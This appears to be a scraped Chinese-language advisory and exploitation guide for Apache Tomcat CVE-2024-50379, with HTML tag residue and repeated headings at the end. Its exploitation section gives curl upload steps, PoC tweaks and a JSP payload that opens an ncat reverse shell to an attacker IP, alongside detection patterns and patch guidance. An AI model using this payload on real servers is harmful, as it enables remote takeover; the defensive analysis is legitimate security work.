Apache Tomcat CVE-2024-50379 漏洞分析与利用指南<\/h1>

漏洞概述<\/h2>
CVE-2024-50379 是 Apache Tomcat 中存在的一个检查时间使用时间 (TOCTOU) 漏洞。该漏洞允许攻击者在特定条件下通过文件上传实现远程代码执行 (RCE)。<\/p>

漏洞类型<\/h3>

TOCTOU (Time of Check Time of Use) 竞争条件漏洞<\/li>

可能导致远程代码执行 (RCE)<\/li> <\/ul>

受影响版本<\/h2>

9.x 系列<\/strong>: 9.0.0.M1 <= Apache Tomcat <= 9.0.98<\/li>
10.x 系列<\/strong>: 10.1.0-M1 <= Apache Tomcat <= 10.1.34<\/li>

11.x 系列<\/strong>: 11.0.0-M1 <= Apache Tomcat <= 11.0.2<\/li> <\/ul>
漏洞成因<\/h2>
该漏洞的产生需要满足以下条件：<\/p>

默认 Servlet 配置不安全<\/strong>:<\/p>

默认 Servlet 启用了写入功能 (readonly=false<\/code>)<\/li>
示例不安全配置: <servlet><\/span> <\/span><\/span> <servlet-name><\/span>default<\/servlet-name><\/span> <\/span><\/span> <servlet-class><\/span>org.apache.catalina.servlets.DefaultServlet<\/servlet-class><\/span> <\/span><\/span> <init-param><\/span> <\/span><\/span> <param-name><\/span>debug<\/param-name><\/span> <\/span><\/span> <param-value><\/span>0<\/param-value><\/span> <\/span><\/span> <\/init-param><\/span> <\/span><\/span> <init-param><\/span> <\/span><\/span> <param-name><\/span>listings<\/param-name><\/span> <\/span><\/span> <param-value><\/span>false<\/param-value><\/span> <\/span><\/span> <\/init-param><\/span> <\/span><\/span> <init-param><\/span> <\/span><\/span> <param-name><\/span>readonly<\/param-name><\/span> <\/span><\/span> <param-value><\/span>false<\/param-value><\/span> <\/span><\/span> <\/init-param><\/span> <\/span><\/span> <load-on-startup><\/span>1<\/load-on-startup><\/span> <\/span><\/span><\/servlet><\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 运行在不区分大小写的系统上<\/strong>:<\/p> 如 Windows 或 macOS<\/li> 在 Linux 等区分大小写的系统上无法利用<\/li> <\/ul> <\/li> 利用机制<\/strong>:<\/p> 攻击者可以上传带有特定扩展名(如 .Jsp<\/code> 或 .JSP<\/code>)的文件<\/li> 通过竞争条件，Tomcat 可能将上传的文件当作可执行的 JSP servlet 处理<\/li> 结合反序列化利用链实现 RCE<\/li> <\/ul> <\/li> <\/ol> 漏洞利用<\/h2> 利用条件<\/h3> 默认 Servlet 开启写入操作 (readonly=false<\/code>)<\/li> 使用基于文件存储的 session，且存储路径默认<\/li> 存在反序列化利用链的 jar 包<\/li> <\/ol> 利用步骤<\/h3> 验证写入权限<\/strong>:<\/p> curl -X PUT -d "test"<\/span> http:\/\/IP:8080\/demo.jsp <\/span><\/span><\/code><\/pre><\/li> 上传恶意文件<\/strong>:<\/p> 上传扩展名为 .Jsp<\/code> 或 .JSP<\/code> 的文件: curl -X PUT -d "<恶意代码>"<\/span> http:\/\/IP:8080\/demo.Jsp <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 利用竞争条件<\/strong>:<\/p> 通过大量请求使服务器过载<\/li> 尝试访问上传的文件作为可执行 JSP<\/li> <\/ul> <\/li> <\/ol> PoC 修改建议<\/h3> 原始 PoC (https:\/\/github.com\/iSee857\/CVE-2024-50379-PoC) 可进行以下优化:<\/p> 修改循环计数器<\/strong>:<\/p> # 原始代码: for _ in range(10000):<\/span> <\/span><\/span>for<\/span> _ in<\/span> range(2000<\/span>): # 更高效的循环次数<\/span> <\/span><\/span><\/code><\/pre><\/li> 更改 Payload<\/strong>:<\/p> <%@ page import="java.io.*" %> <% Runtime.getRuntime().exec("cmd \/c start ncat -e cmd.exe IP 8888"); %> <\/code><\/pre> <\/li> 执行攻击<\/strong>:<\/p> python3 ApachTomcat_CVE-2024-50379_ConditionalCompetitionToRce.py -u IP:8080 <\/span><\/span><\/code><\/pre><\/li> 监听反弹 shell<\/strong>:<\/p> netcat -lvnp 8888<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 注意<\/strong>:<\/p> 可能需要重复执行 PoC 3-4 次才能成功<\/li> 攻击期间终端可能看似停滞，这是正常现象<\/li> <\/ul> 检测方法<\/h2> Web 访问日志检测<\/h3> 在 access_log<\/code> 中查找以下模式:<\/p> 直接上传攻击<\/strong>:<\/p> PUT \/cve.Jsp GET \/cve.jsp <\/code><\/pre> 重复大量此类请求<\/li> 最终会返回 200 状态码(成功)或 404(失败)<\/li> <\/ul> <\/li> 通过上传表单攻击<\/strong>:<\/p> POST \/app\/template-upload.jsp GET \/uploads\/revshell.jsp <\/code><\/pre> <\/li> <\/ol> 系统日志检测<\/h3> 文件创建监控<\/strong>:<\/p> 查找可疑的 JSP 文件创建<\/li> 特别是包含 exec()<\/code> 等危险字符串的文件<\/li> <\/ul> <\/li> 进程执行监控<\/strong>:<\/p> Tomcat 进程生成 CMD 或 PowerShell 子进程<\/li> 异常进程创建行为<\/li> <\/ul> <\/li> <\/ol> 修复方案<\/h2> 官方修复版本<\/h3> 11.x 系列<\/strong>: 升级到 11.0.3 或更高<\/li> 10.x 系列<\/strong>: 升级到 10.1.35 或更高<\/li> 9.x 系列<\/strong>: 升级到 9.0.99 或更高<\/li> <\/ul> 临时缓解措施<\/h3> 配置修复<\/strong>:<\/p> 确保默认 Servlet 配置为 readonly=true<\/code><\/li> <\/ul> <init-param><\/span> <\/span><\/span> <param-name><\/span>readonly<\/param-name><\/span> <\/span><\/span> <param-value><\/span>true<\/param-value><\/span> <\/span><\/span><\/init-param><\/span> <\/span><\/span><\/code><\/pre><\/li> Java 系统属性调整<\/strong>:<\/p> Java 8\/11 用户: 设置 sun.io.useCanonCaches=false<\/code><\/li> Java 17 用户: 确保 sun.io.useCanonCaches<\/code> 未设置为 false<\/code><\/li> <\/ul> <\/li> <\/ol> 技术背景<\/h2> TOCTOU 原理<\/h3> TOCTOU (Time of Check Time of Use) 漏洞是由于:<\/p> 系统检查资源状态<\/li> 在使用资源前，资源状态被改变<\/li> 系统使用了改变后的资源<\/li> <\/ol> 在本漏洞中:<\/p> Tomcat 检查文件扩展名(区分大小写)<\/li> 操作系统处理文件时不区分大小写<\/li> 通过竞争条件绕过安全检查<\/li> <\/ol> 文件扩展名处理差异<\/h3> Tomcat<\/strong>: 严格区分 .jsp<\/code> 和 .Jsp<\/code><\/li> Windows\/macOS<\/strong>: 不区分大小写，视为同一文件<\/li> Linux<\/strong>: 区分大小写，无法利用此漏洞<\/li> <\/ul> 总结<\/h2> CVE-2024-50379 是一个严重的 Tomcat 漏洞，允许攻击者在特定条件下实现远程代码执行。管理员应立即检查服务器配置并升级到修复版本。对于无法立即升级的系统，应实施推荐的缓解措施，特别是确保默认 Servlet 配置为只读模式。<\/p>

Apache Tomcat CVE-2024-50379 漏洞分析与利用指南<\/h1>

漏洞概述<\/h2> CVE-2024-50379 是 Apache Tomcat 中存在的一个检查时间使用时间 (TOCTOU) 漏洞。该漏洞允许攻击者在特定条件下通过文件上传实现远程代码执行 (RCE)。<\/p>

漏洞利用<\/h2>

检测方法<\/h2>

修复方案<\/h2>

技术背景<\/h2>

漏洞概述<\/h2>
CVE-2024-50379 是 Apache Tomcat 中存在的一个检查时间使用时间 (TOCTOU) 漏洞。该漏洞允许攻击者在特定条件下通过文件上传实现远程代码执行 (RCE)。<\/p>